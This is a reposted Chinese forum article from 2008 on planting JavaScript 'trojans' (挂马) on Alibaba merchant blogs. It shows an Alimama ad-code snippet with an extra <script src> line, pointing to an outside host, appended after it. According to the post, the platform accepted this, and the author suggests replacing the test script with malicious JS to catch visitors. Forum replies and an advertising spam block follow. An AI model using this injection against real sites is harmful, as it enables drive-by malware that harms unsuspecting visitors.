阿里巴巴网商博客之挂马发现
作者:黑色水银&地址:http://www.54hssy.cn/?action=show&id=589
此文章已发表在《黑客手册》2008年第9期杂志上
后经作者发布在博客上,如转载请务必保留此信息!
这两天都在想着做网络买卖于是淘宝网是我必须要去的地方陆续开通了自己的网上销售商店和网上广告销售商店后就开始像阿里巴巴进军,不可避免的我开通了阿里巴巴网商博客,在我使用阿里巴巴网商博客的时候发现这个博客系统可以用来添加广告在标题处可以看到“请在下框中添加阿里妈妈广告代码,垂直广告,图片尺寸为 120(宽)*240(高)”那么既然是这个我也就很快速的将自己博客里的广告代码加了进去。效果如图:
http://www.hxhack.com/bbs/attachment/19_2_60da4d38e105b71.jpg
图1
http://www.hxhack.com/bbs/attachment/19_2_0e362e47837a664.jpg
图2
原本事情到此就该结束的可是不知为何此时一个网友QQ消息问我要是用JS挂马可好?
于是我突然想到在阿里妈妈的广告代码里我们可以看到他就是利用的JS调用。例如:
<script type=\"text/JavaScript\">
alimama_pid=\"mm_10768264_885486_1953253\";
alimama_titlecolor=\"0000FF\";
alimama_descolor =\"000000\";
alimama_bgcolor=\"FFFFFF\";
alimama_bordercolor=\"E6E6E6\";
alimama_linkcolor=\"008000\";
alimama_bottomcolor=\"FFFFFF\";
alimama_anglesize=\"0\";
alimama_bgpic=\"0\";
alimama_icon=\"0\";
alimama_sizecode=\"22\";
alimama_width=120;
alimama_height=240;
alimama_type=2;
</script>
<script src=\"http://a.alimama.cn/inf.js\" type=text/javascript></script>
在最后的脚本语言中正是调用了inf.js这个js文件呀
那么如果将js挂马的语句也加在最后或是替换掉他的这个inf.js会不会出现js挂马的效果呢?
有了猜测那就来试验下吧!先将他的js替换掉语句如:
<script type=\"text/JavaScript\">
alimama_pid=\"mm_10768264_885486_1953253\";
alimama_titlecolor=\"0000FF\";
alimama_descolor =\"000000\";
alimama_bgcolor=\"FFFFFF\";
alimama_bordercolor=\"E6E6E6\";
alimama_linkcolor=\"008000\";
alimama_bottomcolor=\"FFFFFF\";
alimama_anglesize=\"0\";
alimama_bgpic=\"0\";
alimama_icon=\"0\";
alimama_sizecode=\"22\";
alimama_width=120;
alimama_height=240;
alimama_type=2;
</script>
<script src=\"http://www.54hssy.cn/beifen/alexa3.js\" type=text/javascript>
</script>
提交后返回错误如图:
http://www.hxhack.com/bbs/attachment/19_2_bd863a9192d99b9.jpg
图3
看来阿里公司的安全人员还是注意到了这点,这个不能成功没为题还有一个没有测试,那么我在他的最后加上在这个会如何呢?代码如:
<script type=\"text/JavaScript\">
alimama_pid=\"mm_10768264_885486_1953253\";
alimama_titlecolor=\"0000FF\";
alimama_descolor =\"000000\";
alimama_bgcolor=\"FFFFFF\";
alimama_bordercolor=\"E6E6E6\";
alimama_linkcolor=\"008000\";
alimama_bottomcolor=\"FFFFFF\";
alimama_anglesize=\"0\";
alimama_bgpic=\"0\";
alimama_icon=\"0\";
alimama_sizecode=\"22\";
alimama_width=120;
alimama_height=240;
alimama_type=2;
</script>
<script src=\"http://a.alimama.cn/inf.js\" type=text/javascript></script>
<script src=\"http://www.54hssy.cn/beifen/alexa3.js\" type=text/javascript></script>
提交后提示成功如图:
http://www.hxhack.com/bbs/attachment/19_2_43cf643b3c49bca.jpg
图4
然后进入博客首页看看效果如图:
http://www.hxhack.com/bbs/attachment/19_2_b9a01043647da31.jpg
图5
成功了。我用来测试的那个JS代码是个显示自己网站的ALEXA排名的。既然他可以那么当我们换上自己的js马后呢?当然也是可以的。至于如何利用呵呵我想有了阿里巴巴的玉米这个鱼饵吊起鱼来那可是。。。。呵呵。
好了文章么有什么技术性仅供个人娱乐。 学习了,。感谢了。 有这么严重啊 学习下~没技术还是不怎么行啊~ 九头鸟广告联盟,本联盟专注于点击和弹窗广告多年, 内容丰富,单价高,永
不下线,可有效帮您提升收入.欢迎广大站长投放测试广告样式。 期待与您的合作
客服QQ:613385484
本文来自: 牛站长论坛 详细文章参考:http://www.nb5.cn/forum.php?mod=viewthread&tid=1023880&extra=
页:
[1]